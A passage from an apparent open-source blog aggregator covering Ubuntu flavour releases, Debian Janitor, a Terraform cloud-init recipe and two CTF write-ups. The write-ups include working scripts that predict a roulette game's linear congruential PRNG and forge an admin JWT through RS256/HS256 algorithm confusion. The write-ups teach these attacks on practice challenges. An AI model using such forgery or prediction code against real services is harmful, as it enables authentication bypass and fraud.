Bruce had a similar slide deck, and you can read his slides on iOS’s browser monopoly and progressive web apps. Bruce has also summarised our other colleague’s presentation, which is what we led off with. The discussion that we then went into was really interesting; they asked some very sensible questions, and showed every sign of properly understanding the problem already and wanting to understand it better. This was good: honestly, I was a bit worried that we might be trying to explain the difference between a browser and a rendering engine to a bunch of retired colonel types who find technology to be baffling and perhaps a little unmanly, and this was emphatically not the case; I found the committee engaging and knowledgeable, and this is encouraging.

In the last few weeks we’ve seen quite a few different governments and regulatory authorities begin to take a stand against tech companies generally and Apple’s control over your devices more specifically. These are baby steps — video and music apps are now permitted to add a link to their own website, saints preserve us, after the Japan Fair Trade Commission’s investigation; developers are now allowed to send emails to their own users which mention payments, which is being hailed as “flexibility” although it doesn’t allow app devs to tell their users about other payment options in the app itself, and there are still court cases and regulatory investigations going on all around the world. Still, the tide may be changing here.

What I would like is that I can give users the best experience on the web, on the best mobile hardware. That best mobile hardware is Apple’s, but at the moment if I want to choose Apple hardware I have to choose a sub-par web experience. Nobody can fix this other than Apple, and there are a bunch of approaches that they could take — they could make Safari be a best-in-class experience for the web, or they could allow other people to collaborate on making the browser best-in-class, or they could stop blocking other browsers from their hardware. People have lots of opinions about which of these, or what else, could and should be done about this; I think pretty much everyone thinks that something should be done about it, though. Even if your goal is to slow the web down and to think that it shouldn’t compete with native apps, there’s no real reason why flexbox and grid and transforms should be worse in Safari, right? Anyway, go and read the talk for more detail on all that. And I’m interested in what you think. Do please hit me up on Twitter about this, or anything else; what do you think should be done, and how?

on September 05, 2021 11:05 PM

August 31, 2021

Full Circle Weekly News #225

Full Circle Magazine

GTK 4.4 graphical toolkit:

GNOME 41 Beta Available:

Release of the GNU Taler 0.8:

Linux kernel turns 30:

Release of QEMU Emulator 6.1:

SeaMonkey 2.53.9:

Free OpenShot Video Editor 2.6.0 Released:

The GNOME Project has launched an Application Web Directory:

Ubuntu 20.04.3 LTS Release with Graphics Stack and Linux Kernel Updates:

DogLinux Build Update:

Qt Creator 5.0 Released:

LibreELEC 10.0:

New releases of anonymous network I2P 1.5.0:

Delta Chat 1.22 messenger is available:


Full Circle Magazine
Host: @bardictriad,
Bumper: Canonical
Theme Music: From The Dust – Stardust

on August 31, 2021 06:06 PM

Returning to DebConf

Benjamin Mako Hill

I first started using Debian sometime in the mid 90s and started contributing as a developer and package maintainer more than two decades years ago. My first very first scholarly publication, collaborative work led by Martin Michlmayr that I did when I was still an undergrad at Hampshire College, was about quality and the reliance on individuals in Debian. To this day, many of my closest friends are people I first met through Debian. I met many of them at Debian’s annual conference DebConf.

Given my strong connections to Debian, I find it somewhat surprising that although all of my academic research has focused on peer production, free culture, and free software, I haven’t actually published any Debian related research since that first paper with Martin in 2003!

So it felt like coming full circle when, several days ago, I was able to sit in the virtual DebConf audience and watch two of my graduate student advisees—Kaylea Champion and Wm Salt Hale—present their research about Debian at DebConf21.

Salt presented his masters thesis work which tried to understand the social dynamics behind organizational resilience among free software projects. Kaylea presented her work on a new technique she developed to identifying at risk software packages that are lower quality than we might hope given their popularity (you can read more about Kaylea’s project in our blog post from earlier this year).

If you missed either presentation, check out the blog post my research collective put up or watch the videos below. If you want to hear about new work we’re doing—including work on Debian—you should follow our research group blog, and/or follow or engage with us in the Fediverse (, or on Twitter (@comdatasci).

And if you’re interested in joining us—perhaps to do more research on FLOSS and/or Debian and/or a graduate degree of your own?—please be in touch with me directly!

Wm Salt Hale’s presentation plus Q&A. (WebM available)
Kaylea Champion’s presentation plus Q&A. (WebM available)
on August 31, 2021 01:29 AM

August 29, 2021

Xubuntu 20.04, Focal Fossa

Xubuntu Development Update August 2021Xubuntu 20.04.3, our latest LTS release update.
Xubuntu Development Update August 2021

Xubuntu 20.04.3 was released on Thursday, August 26th. It&aposs a maintenance release consisting primarily of bug fixes and security updates. You can find the full list of changes here. Special thanks to everybody that helped test this release! Download links are available on Some important updates include:

  • exo 0.12.11-1ubuntu1.20.04.1: Fixes resizing the xfce4-settings window smaller (LP: #1874954)
  • xfce4-weather-plugin 0.10.1 -> 0.10.2: Fixes weather lookups due to an expired API  (LP: #1918002)
  • firefox 85 -> 91
  • linux 5.8 -> 5.11
  • thunderbird 68 -> 78

Xubuntu 21.10, Impish Indri

Enabling the Super (Windows) Key

A popular request over the years has been to bind the Super key to show the applications menu. For technical reasons, we weren&apost able to implement this change using what&aposs included in Xfce.

On the upstream bug, Andre Miranda recommended using xcape to work around this particular issue. We&aposve adopted this solution for Xubuntu, and now the Super key shows the applications menu without breaking other Super key shortcuts! I&aposve demoed the Super key functionality on Twitter:

Rhythmbox Alternative Toolbar Layout

Xubuntu Development Update August 2021Rhythmbox 3.4.4 in Xubuntu 21.10

Last month the Twitter community voted on whether to include the standard or the "Alternative Toolbar" layout for Rhythmbox in Xubuntu. With 89 votes and 82% of the vote in favor of the Alternative Toolbar layout, we&aposre now shipping it in Xubuntu!

Slideshow Translations

Xubuntu Development Update August 2021The slideshow displayed while installing Xubuntu.

I did some cleanup on the Xubuntu installer slideshow this month, merging in a pull request, bulk updating translations, and getting everything synced over to Transifex. I was also granted push permissions to the upstream Ubiquity slideshow codebase, making it much easier to sync the Xubuntu updates back over. Going forward, we&aposll have a lot more control over the delivery of our translations. If you want to help contribute to our slideshow translations, please sign up on Transifex!

Package Updates

In August, the Xubuntu packageset saw updates to several Xfce components, MATE 1.26, and the Xubuntu default settings. Remember that you can keep up with Xubuntu&aposs latest package updates by following Planet Bluesabre (RSS, Twitter).

Upcoming Dates

There are some key dates just around the corner in the Release Schedule. Now&aposs the time to start testing if you haven&apost already!

We&aposre getting close to the final release of 21.10 and then beginning of our next LTS, 22.04. If you&aposd like to help out, check out the Get Involved section of the Xubuntu website. We need all sorts of help, so if you&aposve got the time, we&aposd love to help you help us!

on August 29, 2021 07:59 PM

August 27, 2021

Full Circle Magazine #172

Full Circle Magazine

This month:
* Command & Conquer : LMMS
* How-To : Python, Eternal Terminal and Making A Network Print Server
* Graphics : Inkscape
* Everyday Ubuntu : Retrogaming Revised
* Micro This Micro That
* Review : Ubuntu Unity 21.04
* Ubuntu Games : Don’t Forget Me
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot!

on August 27, 2021 05:07 PM

The third point release update to Kubuntu 20.04 LTS (Focal Fossa) is out now. This contains all the bug-fixes added to 20.04 since its first release in April 2020. Users of 20.04 can run the normal update procedure to get these bug-fixes.

See the Ubuntu 20.04.3 Release Notes and the Kubuntu Release Notes.

Download all available released images.

on August 27, 2021 02:47 AM

August 26, 2021

Thanks to all the hard work from our contributors, we are pleased to announce that Lubuntu 20.04.3 LTS has been released! What is Lubuntu? Lubuntu is an official Ubuntu flavor which uses the Lightweight Qt Desktop Environment (LXQt). The project’s goal is to provide a lightweight yet functional Linux distribution based on a rock-solid Ubuntu […]
on August 26, 2021 02:52 PM

August 25, 2021

The Debian Janitor is an automated system that commits fixes for (minor) issues in Debian packages that can be fixed by software. It gradually started proposing merges in early December. The first set of changes sent out ran lintian-brush on sid packages maintained in Git. This post is part of a series about the progress of the Janitor.

Linux distributions like Debian fulfill an important function in the FOSS ecosystem - they are system integrators that take existing free and open source software projects and adapt them where necessary to work well together. They also make it possible for users to install more software in an easy and consistent way and with some degree of quality control and review.

One of the consequences of this model is that the distribution package often lags behind upstream releases. This is especially true for distributions that have tighter integration and standardization (such as Debian), and often new upstream code is only imported irregularly because it is a manual process - both updating the package, but also making sure that it still works together well with the rest of the system.

The process of importing a new upstream used to be (well, back when I started working on Debian packages) fairly manual and something like this:

  • Go to the upstream’s homepage, find the tarball and signature and verify the tarball
  • Make modifications so the tarball matches Debian’s format
  • Diff the original and new upstream tarballs and figure out whether changes are reasonable and which require packaging changes
  • Update the packaging, changelog, build and manually test the package
  • Upload

Ecosystem Improvements

However, there have been developments over the last decade that make it easier to import new upstream releases into Debian packages.

Uscan and debian QA watch

Uscan and debian/watch have been around for a while and make it possible to find upstream tarballs.

A debian watch file usually looks something like this:


The QA watch service regularly polls all watch locations in the archive and makes the information available, so it’s possible to know which packages have changed without downloading each one of them.


Git is fairly ubiquitous nowadays, and most upstream projects and packages in Debian use it. There are still exceptions that do not use any version control system or that use a different control system, but they are becoming increasingly rare. [1]


DEP-12 specifies a file format with metadata about the upstream project that a package was based on. In particular relevant for our case is the fact it has fields for the location of the upstream version control location.

debian/upstream/metadata files look something like this:


While DEP-12 is still a draft, it has already been widely adopted - there are about 10000 packages in Debian that ship a debian/upstream/metadata file with Repository information.


The Autopkgtest standard and associated tooling provide a way to run a defined set of tests against an installed package. This makes it possible to verify that a package is working correctly as part of the system as a whole. regularly runs these tests against Debian packages to detect regressions.

Vcs-Git headers

The Vcs-Git headers in debian/control are the equivalent of the Repository field in debian/upstream/metadata, but for the packaging repositories (as opposed to the upstream ones).

They’ve been around for a while and are widely adopted, as can be seen from zack’s stats:

The vcswatch service that regularly polls packaging repositories to see whether they have changed makes it a lot easier to consume this information in usable way.

Debhelper adoption

Over the last couple of years, Debian has slowly been converging on a single build tool - debhelper’s dh interface.

Being able to rely on a single build tool makes it easier to write code to update packaging when upstream changes require it.

Debhelper DWIM

Debhelper (and its helpers) increasingly can figure out how to do the Right Thing in many cases without being explicitly configured. This makes packaging less effort, but also means that it’s less likely that importing a new upstream version will require updates to the packaging.

With all of these improvements in place, it actually becomes feasible in a lot of situations to update a Debian package to a new upstream version automatically. Of course, this requires that all of this information is available, so it won’t work for all packages. In some cases, the packaging for the older upstream version might not apply to the newer upstream version.

The Janitor has attempted to import a new upstream Git snapshot and a new upstream release for every package in the archive where a debian/watch file or debian/upstream/metadata file are present.

These are the steps it uses:

  • Find new upstream version
    • If release, use debian/watch - or maybe tagged in upstream repository
    • If snapshot, use debian/upstream/metadata’s Repository field
    • If neither is available, use guess-upstream-metadata from upstream-ontologist to guess the upstream Repository
  • Merge upstream version into packaging repository, possibly importing tarballs using pristine-tar
  • Update the changelog file to mention the new upstream version
  • Run some checks to ensure there are no unintentional changes, e.g.:
    • Scan diff between old and new for surprising license changes
      • Today, abort if there are any - in the future, maybe update debian/copyright
    • Check for obvious compatibility breaks - e.g. sonames changing
  • Attempt to update the packaging to reflect upstream changes
    • Refresh patches
  • Attempt to build the package with deb-fix-build, to deal with any missing dependencies
  • Run the autopkgtests with deb-fix-build to deal with missing dependencies, and abort if any tests fail


When run over all packages in unstable (sid), this process works for a surprising number of them.

Fresh Releases

For fresh-releases (aka imports of upstream releases), processing all packages maintained in Git for which QA watch reports new releases (about 11,000):

That means about 2300 packages updated, and about 4000 unchanged.

Fresh Snapshots

For fresh-snapshots (aka imports of latest Git commit from upstream), processing all packages maintained in Git (about 26,000):

Or 5100 packages updated and 2100 for which there was nothing to do, i.e. no upstream commits since the last Debian upload.

As can be seen, this works for a surprising fraction of packages. It’s possible to get the numbers up even higher, by both improving the tooling, the autopkgtests and the metadata that is provided by packages.

Using these packages

All the packages that have been built can be accessed from the Janitor APT repository. More information can be found at, but in short - run:

echo deb "[arch=amd64 signed-by=/usr/share/keyrings/debian-janitor-archive-keyring.gpg]" \ fresh-snapshots main | sudo tee /etc/apt/sources.list.d/fresh-snapshots.list
echo deb "[arch=amd64 signed-by=/usr/share/keyrings/debian-janitor-archive-keyring.gpg]" \ fresh-releases main | sudo tee /etc/apt/sources.list.d/fresh-releases.list
sudo curl -o /usr/share/keyrings/debian-janitor-archive-keyring.gpg
apt update

And then you can install packages from the fresh-snapshots (upstream git snapshots) or fresh-releases suites on a case-by-case basis by running something like:

apt install -t fresh-snapshots r-cran-roxygen2

Most packages are updated based on information provided by vcswatch and qa watch, but it’s also possible for upstream repositories to call a web hook to trigger a refresh of a package.

These packages were built against unstable, but should in almost all cases also work for testing.


Of course, since these packages are built automatically without human supervision it’s likely that some of them will have bugs in them that would otherwise have been caught by the maintainer.

[1]I’m not saying that a monoculture is great here, but it does help distributions.
on August 25, 2021 06:00 PM

August 22, 2021

Late August Update

Stephen Michael Kellat

You know you’ve been busy when it has been almost an entire month since you’ve made a blog post. Reducing things to bullet points (give or take) may prove best. In no particular order:

  • I learned about edbrowse from the latest episode of the Ubuntu Podcast. If I ever wind up using an actual teletype for a terminal that might be quite handy.

  • Work continues on a provisional effort to rig up something for podcasting using a static site generator. Someone already started the work in jekyll and put it on GitHub. Now the name of the game is adapting what they did to suit my purposes.

  • The testing manifest for Impish Indri shows only vanilla Ubuntu desktop shipping an image for Raspberry Pi. Considering my working “desktop” at the moment is a Raspberry Pi 4, any testing efforts on my part may wind up limited as I do not normally test vanilla Ubuntu desktop.

  • There are initial concepts for the fourth story roughly developed. I’m not quite sure where they might lead. Further development is required.

  • Campaigning? What campaigning? That’s not quite in progress in any traditional sense. The delta variant of SARS-CoV-2 is forcing non-traditional directions to all that, too.

  • Something akin to a DECwriter or TI Silent 700 mated to a Raspberry Pi would allow for some computing access if I wind up getting significant eye strain from seeing too many computer screens…again. It feels weird to even be thinking about such things.

  • Things can improve no matter how bleak the world around us looks. It was fairly shocking Saturday to see how desensitized people had become to disasters. A nasty hurricane was bearing down on New York City and New England yet it was being ignored by the main news media outlets.

  • I am spending quite a bit of time using to find streams to listen to. More people should make use of it.

Tags: Life

on August 22, 2021 05:41 PM

August 19, 2021

Terraform is a powerful tool. However, it has some limitations: since it uses AWS APIs, it doesn’t have a native way to check if an EC2 instance has completed to run cloud-init before marking it as ready. A possible workaround is asking Terraform to SSH on the instance, and wait until it is able to perform a connection before marking the instance as ready.


Terraform logo, courtesy of HashiCorp.

I find using SSH in Terraform quite problematic: you need to distribute a private SSH key to anybody that will launch the Terraform script, including your CI/CD system. This is a no-go for me: it adds the complexity to manage SSH keys, including their rotation. There is a huge issue on the Terraform repo on GitHub about this functionality, and the most voted solution is indeed connecting via SSH to run a check:

provisioner "remote-exec" {
  inline = [
    "cloud-init status --wait"

AWS Systems Manager Run Command

The idea of using cloud-init status --wait is indeed quite good. The only problem is how do we ask Terraform to run such command. Luckily for us, AWS has a service, AWS SSM Run Command that allow us to run commands on an EC2 instance through AWS APIs! In this way, our CI/CD system needs only an appropriate IAM role, and a way to invoke AWS APIs. I use the AWS CLI in the examples below, but you can adapt them to any language you prefer.


If you don’t know AWS SSM yet, go and take a look to their introductory guide. There are some prerequisites to use AWS SSM Run Command: we need to have AWS SSM Agent installed on our instance. It is preinstalled on Amazon Linux 2 and Ubuntu 16.04, 18.04, and 20.04. For any other OS, we need to install it manually: it is supported on Linux, macOS, and Windows.

The user or the role that executes the Terraform code needs to be able to create, update, and read AWS SSM Documents, and run SSM commands. A possible policy could be look like this:

  "Version": "2012-10-17",
  "Statement": [
      "Sid": "Stmt1629387563127",
      "Action": [
      "Effect": "Allow",
      "Resource": "*"

If we already know the name of the documents, or the instances where we want to run the commands, it is better to lock down the policy specifying the resources, accordingly to the principle of least privilege.

Last but not least, we need to have the AWS CLI installed on the system that will execute Terraform.

The Terraform code

After having set up the prerequisites as above, we need two different Terraform resources. The first will create the AWS SSM Document with the command we want to execute on the instance. The second one will execute such command while provisioning the EC2 instance.

The AWS SSM Document code will look like this:

resource "aws_ssm_document" "cloud_init_wait" {
  name = "cloud-init-wait"
  document_type = "Command"
  document_format = "YAML"
  content = <<-DOC
    schemaVersion: '2.2'
    description: Wait for cloud init to finish
    - action: aws:runShellScript
      name: StopOnLinux
        - platformType
        - Linux
        - cloud-init status --wait

We can refer such document from within our EC2 instance resource, with a local provisioner:

resource "aws_instance" "example" {
  ami           = "my-ami"
  instance_type = "t3.micro"

  provisioner "local-exec" {
    interpreter = ["/bin/bash", "-c"]

    command = <<-EOF
    set -Ee -o pipefail
    export AWS_DEFAULT_REGION=${}

    command_id=$(aws ssm send-command --document-name ${aws_ssm_document.cloud_init_wait.arn} --instance-ids ${} --output text --query "Command.CommandId")
    if ! aws ssm wait command-executed --command-id $command_id --instance-id ${}; then
      echo "Failed to start services on instance ${}!";
      echo "stdout:";
      aws ssm get-command-invocation --command-id $command_id --instance-id ${} --query StandardOutputContent;
      echo "stderr:";
      aws ssm get-command-invocation --command-id $command_id --instance-id ${} --query StandardErrorContent;
      exit 1;
    echo "Services started successfully on the new instance with id ${}!"


From now on, Terraform will wait for cloud-init to complete before marking the instance ready.


AWS Session Manager, AWS Run Commands, and the others tools in the AWS Systems Manager family are quite powerful, and in my experience they are not widely use. I find them extremely useful: for example, they also allows connecting via SSH to the instances without having any port open, included the 22! Basically, they allow managing and running commands inside instances only through AWS APIs, with a lot of benefits, as they explain:

Session Manager provides secure and auditable instance management without the need to open inbound ports, maintain bastion hosts, or manage SSH keys. Session Manager also allows you to comply with corporate policies that require controlled access to instances, strict security practices, and fully auditable logs with instance access details, while still providing end users with simple one-click cross-platform access to your managed instances.

DO you have any questions, feedback, critics, request for support? Leave a comment below, reach me on Twitter (@rpadovani93) or drop me an email at


on August 19, 2021 06:30 PM

August 17, 2021

Adding comments to the blog

Riccardo Padovani

After years of blogging, I’ve finally chosen to add a comment system, including reactions, to this blog. I’ve done so to make it easier engaging with the four readers of my blabbering: of course, it took some time to choose the right comment provider, but finally, here we are!


A picture I took at the CCC 2015 - and the moderation policy for comments!

I’ve chosen, long ago, to do not put any client-side analytics on this website: while the nerd in me loves graph and numbers, I don’t think they are worthy of the loss of privacy and performance for the readers. However, I am curious to have feedback on the content I write, if some of them are useful, and how can I improve. In all these years, I’ve received different emails about some posts, and they are heart-warming. With comments, I hope to reduce the friction in communicating with me and having some meaningful interaction with you.


Looking for a comment system, I had three requirements in mind: being privacy-friendly, being performant, and being managed by somebody else.

A lot of comments system are “free”, because they live on advertisements, or tracking user activities, and more often a combination of both. However, since I want comments on my website, I find dishonest that you, the user, has to pay the price for it. So, I was looking for something that didn’t track users, and bases its business on dear old money. My website, my wish, my wallet.

I find performances important, and unfortunately, quite undervalued on the bloated Internet. I like having just some HTML, some CSS, and the minimum necessary of JavaScript, so whoever stumbles on these pages don’t waste CPU and time waiting for some rendering. Being a static website, there isn’t a server side, so I cannot put comments there. I had to find a really light JavaScript based comment system.

Given these two prerequisites, you would say the answer is obvious: find a comment system that you can self-host! And you would be perfectly right - however, since I spend already 8 hours a day keeping stuff online, I really don’t want to have to care about performance and uptime in my free time - I definitely prefer going drinking a beer with a friend.

After some shopping around, I’ve chosen to go with Hyvor Talk, since it checks all three requirements above. I’ve read nice things about it, so let’s see how it goes! And if you don’t see comments at the end of the page, probably a privacy plugin for your browser is blocking it - up to you if you want to whitelist my website, or communicate with me in other ways ;-)

A nice plus of Hyvor is they also support reactions, so if you are in an hurry but want still to leave a quick feedback on the post, you can simply click a button. Fancy, isn’t it?


Internet can be ugly sometime, and this is why I will keep a strict eye on the comments, and I will probably adjust moderation settings in the future, based on how things evolve - maybe no-one will comment, then no need for any strict moderation! The only rule I ask you to abide, and I’ve put as moderation policy, is: “Be excellent to each other”. I’ve read it at the CCC Camp 2015, and it sticks with me: as every short sentence, cannot capture all the nuances of human interaction, but I think it is a very solid starting point. If you have any concern or feedback you prefer to do not express in public, feel free to reach me through email. Otherwise, I hope to see you all in the comment section ;-)

Questions, comments, feedback, critics, suggestions on how to improve my English? Reach me on Twitter (@rpadovani93) or drop me an email at Or, from today, leave a comment below!


on August 17, 2021 10:00 PM

August 12, 2021

0x0G is Google’s annual “Hacker Summer Camp” event. Normally this would be in Las Vegas during the week of DEF CON and Black Hat, but well, pandemic rules apply. I’m one of the organizers for the CTF we run during the event, and I thought I’d write up solutions to some of my challenges here.

gRoulette is a simplified Roulette game online. Win enough and you’ll get the flag. The source code is provided, and the entire thing is run over a WebSocket connection to the server.


Examining the websocket flow, we series of messages:


Taking a look at the source code, we see that the rounds are handled by a function in roulette.go:

func (g *RouletteGame) PlayRound() {

	// Finish the round
	finishedRound := g.CurrentRound
	space := g.NextSpace()
	g.CurrentRound = g.prng.Next()
	res := &RoundResult{
		RoundID:     finishedRound,
		NextRoundID: g.CurrentRound,
		Space:       space,

This tells us the space where the “ball” lands is computed using a NextSpace function:

func (g *RouletteGame) NextSpace() SpaceID {
	num := g.prng.BoundedNext(37)
	if num == 37 {
		return "00" // Special case double 0.
	return SpaceID(fmt.Sprintf("%d", num))

Of interest is that both the CurrentRound and Space values are derived from the same PRNG instance. Depending on the security of the RNG, it may be possible to predict the next space(s) based on the current state of the RNG. The source of the PRNG is provided as well:

package main

import (

const (
	PrngModulus    uint32 = 0x7FFFFFFF
	PrngMultiplier uint32 = 48271

type PRNG uint32

func NewPRNG(seed uint32) *PRNG {
	if seed == 0 {
		if err := binary.Read(rand.Reader, binary.BigEndian, &seed); err != nil {
	p := PRNG(seed)
	return &p

 Algorithm certified by Nanopolis Gaming Commission
func (p *PRNG) Next() uint32 {
	tmp := uint64(*p) * uint64(PrngMultiplier)
	tmp %= uint64(PrngModulus)
	*p = PRNG(tmp)
	return uint32(tmp)

func makeBitmask(v uint32) uint32 {
	rv := uint32(0)
	for v != 0 {
		rv = rv << 1
		rv |= 1
		v = v >> 1
	return rv

func (p *PRNG) BoundedNext(max uint32) uint32 {
	mask := makeBitmask(max)
	for {
		tmp := p.Next() & mask
		if tmp <= max {
			return tmp

The Next method is responsible for advancing the PRNG. It multiplies by a constant, then takes a modulus. Searching for the constants reveals that this is an implementation of a well-known Linear Congruential Generator. This implementation is similar to the MINSTD RNG, and exposes the entire state in a call to Next. Notably the RoundID is entirely an output of the PRNG, so every subsequent value can be known. Consequently, we can call the PRNG with our own inputs to find out what the next spins will be.

package main

import (

func main() {
        seed64, err := strconv.ParseInt(os.Args[1], 10, 32)
        if err != nil {
        round := uint32(seed64)
        p := NewPRNG(round)
        for i := 0; i < 8; i++ {
                roll := p.BoundedNext(37)
                v := fmt.Sprintf("%d", roll)
                if roll == 37 {
                        v = "00"
                fmt.Printf("%d: %s\n", round, v)
                round = p.Next()

When we run it, this will print out the next 8 rolls:

% go run . 520308631
520308631: 8
439000315: 0
2059893773: 33
1060020398: 5
1254119902: 32
1689320946: 2
918638365: 28
114073520: 20

Just max bet each one and you’ll have the requisite money in no time. :) (Feel free to automate it. I just did it manually.)

FLAG: 0x0G{maybe_vegas_next_year_for_real!}

gRoulette Solved

on August 12, 2021 07:00 AM

0x0G is Google’s annual “Hacker Summer Camp” event. Normally this would be in Las Vegas during the week of DEF CON and Black Hat, but well, pandemic rules apply. I’m one of the organizers for the CTF we run during the event, and I thought I’d write up solutions to some of my challenges here.

The first such challenge is authme, a web/crypto challenge. The description just wants to know if you can auth as admin and directs you to a website. On the website, we find a link to the source code, to an RSA public key, and a login form.

Attempting to login, we are told to try “test/test” for demo purposes. Using “test/test”, we are logged in, but it just says “Welcome, test” – not the exciting output we were hoping for. Let’s examine the source:

import flask
import jwt
import collections
import logging
import hashlib

app = flask.Flask(__name__)

KeyType = collections.namedtuple(
        ('algo', 'pubkey', 'key'),
        defaults=(None, None))

COOKIE_NAME = 'authme_session'

KEYS = {
        'k1': KeyType(
        'k2': KeyType(

FLAG = open('flag.txt', 'r').read()

def jwt_encode(payload, kid=DEFAULT_KEY):
    key = KEYS[kid]
    return jwt.encode(
            headers={'kid': kid})

def jwt_decode(data):
    header = jwt.get_unverified_header(data)
    kid = header.get('kid')
    if kid not in KEYS:
        raise jwt.InvalidKeyError("Unknown key!")
    return jwt.decode(
            key=(KEYS[kid].pubkey or KEYS[kid].key),
            algorithms=['HS256', 'RS256'])

def get_user_info():
    sess = flask.request.cookies.get(COOKIE_NAME)
    if sess:
        return jwt_decode(sess)
    return None

def home():
        user = get_user_info()
    except Exception as ex:'JWT error: %s', ex)
        return flask.render_template(
                error="Error loading session!")
    return flask.render_template(

@app.route("/login", methods=['POST'])
def login():
    u = flask.request.form.get('username')
    p = flask.request.form.get('password')
    if u == "test" and p == "test":
        # do login
        resp = flask.redirect("/")
        resp.set_cookie(COOKIE_NAME, jwt_encode({"username": u}))
        return resp
    # render login error page
    return flask.render_template(
            error="Invalid username/password.  Try test/test for testing!"

def get_pubkey(kid):
    if kid in KEYS:
        key = KEYS[kid].pubkey
        if key is not None:
            resp = flask.make_response(key)
            resp.headers['Content-type'] = 'text/plain'
            return resp

def get_authme():
    contents = open(__file__).read()
    resp = flask.make_response(contents)
    resp.headers['Content-type'] = 'text/plain'
    return resp

def prepare_key(unused_self, k):
    if k is None:
        raise ValueError('Missing key!')
    if len(k) < 32:
        return jwt.utils.force_bytes(hashlib.sha256(k).hexdigest())
    return jwt.utils.force_bytes(k)

jwt.algorithms.HMACAlgorithm.prepare_key = prepare_key

A few things should stand out to you:

  • The flag is passed to the template no matter what, so it’s probably some simple template logic to determine whether or not to show the flag.
  • The only username and password accepted for login is a hard-coded value of “test” and “test”.
  • We see that JWTs are being used to manage user sessions. These are stored in a session cookie, creatively called authme_session.
  • There’s multiple keys and algorithms supported.

The RSA public key is provided, but there’s no indication that it’s a weak key in any way. (It’s not, as far as I know…) When verifying the JWT, it’s worth noting that rather than passing the algorithm for the specific key, the library is passed both RS256 and HS256. This means that both keys can be used with both algorithms when decoding the session.

Using an HMAC-SHA-256 key as an RSA key is probably not helpful (especially if you don’t know the HMAC key), but what about the reverse – using an RSA key as an HMAC-SHA-256 key? Examining the code, it shows that the public key is passed in to the verification function. Maybe we can sign a JWT using the public RSA key, but the HS256 algorithm in the JWT?

import jwt

def prepare_key(unused_self, k):
    if k is None:
        raise ValueError('Missing key!')
    if len(k) < 32:
        return jwt.utils.force_bytes(hashlib.sha256(k).hexdigest())
    return jwt.utils.force_bytes(k)

jwt.algorithms.HMACAlgorithm.prepare_key = prepare_key

key = open('k2', 'rb').read()
print(jwt.encode({"username": "admin"}, key=key, algorithm='HS256',
    headers={"kid": "k2"}))

prepare_key is copied directly from the authme source. This prints a JWT, but does it work?


If we put this into our session cookie in our browser and refresh, we’re presented with the reward:


This is a vulnerability called JWT Algorithm Confusion. See Critical vulnerabilities in JSON Web Token libraries, JSON Web Token attacks and vulnerabilities for more about this.

on August 12, 2021 07:00 AM

August 03, 2021

Using NFS persistent volumes is a relatively easy, for kubernetes, on-ramp to using the kubernetes storage infrastructure. Before following this guide, you should have an installed kubernetes cluster. If you don’t, check out the guide how to Install K3s. Setting up the NFS share We will share a directory on the primary cluster node for all the other nodes to access. I will assume that you want to share a filesystem mounted at /mnt/storage-disk.
on August 03, 2021 04:02 PM
While I don’t find the dashboard very useful for configuring anything in the cluster, it can be helpful to find a resource you’ve lost track of or discover resources you didn’t know were there. Before following this guide, you should have an installed kubernetes cluster. If you don’t, check out the guide how to Install K3s. Installing the dashboard To install the dashboard we need to run the following one command on the primary cluster node (in my example, this is k8s-1).
on August 03, 2021 04:01 PM

August 02, 2021

After a very long porting journey, Launchpad is finally running on Python 3 across all of our systems.

I wanted to take a bit of time to reflect on why my emotional responses to this port differ so much from those of some others who’ve done large ports, such as the Mercurial maintainers. It’s hard to deny that we’ve had to burn a lot of time on this, which I’m sure has had an opportunity cost, and from one point of view it’s essentially running to stand still: there is no single compelling feature that we get solely by porting to Python 3, although it’s clearly a prerequisite for tidying up old compatibility code and being able to use modern language facilities in the future. And yet, on the whole, I found this a rewarding project and enjoyed doing it.

Some of this may be because by inclination I’m a maintenance programmer and actually enjoy this sort of thing. My default view tends to be that software version upgrades may be a pain but it’s much better to get that pain over with as soon as you can rather than trying to hold back the tide; you can certainly get involved and try to shape where things end up, but rightly or wrongly I can’t think of many cases when a righteously indignant user base managed to arrange for the old version to be maintained in perpetuity so that they never had to deal with the new thing (OK, maybe Perl 5 counts here).

I think a more compelling difference between Launchpad and Mercurial, though, may be that very few other people really had a vested interest in what Python version Launchpad happened to be running, because it’s all server-side code (aside from some client libraries such as launchpadlib, which were ported years ago). As such, we weren’t trying to do this with the internet having Strong Opinions at us. We were doing this because it was obviously the only long-term-maintainable path forward, and in more recent times because some of our library dependencies were starting to drop support for Python 2 and so it was obviously going to become a practical problem for us sooner or later; but if we’d just stayed on Python 2 forever then fundamentally hardly anyone else would really have cared directly, only maybe about some indirect consequences of that. I don’t follow Mercurial development so I may be entirely off-base, but if other people were yelling at me about how late my project was to finish its port, that in itself would make me feel more negatively about the project even if I thought it was a good idea. Having most of the pressure come from ourselves rather than from outside meant that wasn’t an issue for us.

I’m somewhat inclined to think of the process as an extreme version of paying down technical debt. Moving from Python 2.7 to 3.5, as we just did, means skipping over multiple language versions in one go, and if similar changes had been made more gradually it would probably have felt a lot more like the typical dependency update treadmill. I appreciate why not everyone might want to think of it this way: maybe this is just my own rationalization.

Reflections on porting to Python 3

I’m not going to defend the Python 3 migration process; it was pretty rough in a lot of ways. Nor am I going to spend much effort relitigating it here, as it’s already been done to death elsewhere, and as I understand it the core Python developers have got the message loud and clear by now. At a bare minimum, a lot of valuable time was lost early in Python 3’s lifetime hanging on to flag-day-type porting strategies that were impractical for large projects, when it should have been providing for “bilingual” strategies (code that runs in both Python 2 and 3 for a transitional period) which is where most libraries and most large migrations ended up in practice. For instance, the early advice to library maintainers to maintain two parallel versions or perhaps translate dynamically with 2to3 was entirely impractical in most non-trivial cases and wasn’t what most people ended up doing, and yet the idea that 2to3 is all you need still floats around Stack Overflow and the like as a result. (These days, I would probably point people towards something more like Eevee’s porting FAQ as somewhere to start.)

There are various fairly straightforward things that people often suggest could have been done to smooth the path, and I largely agree: not removing the u'' string prefix only to put it back in 3.3, fewer gratuitous compatibility breaks in the name of tidiness, and so on. But if I had a time machine, the number one thing I would ask to have been done differently would be introducing type annotations in Python 2 before Python 3 branched off. It’s true that it’s technically possible to do type annotations in Python 2, but the fact that it’s a different syntax that would have to be fixed later is offputting, and in practice it wasn’t widely used in Python 2 code. To make a significant difference to the ease of porting, annotations would need to have been introduced early enough that lots of Python 2 library code used them so that porting code didn’t have to be quite so much of an exercise of manually figuring out the exact nature of string types from context.

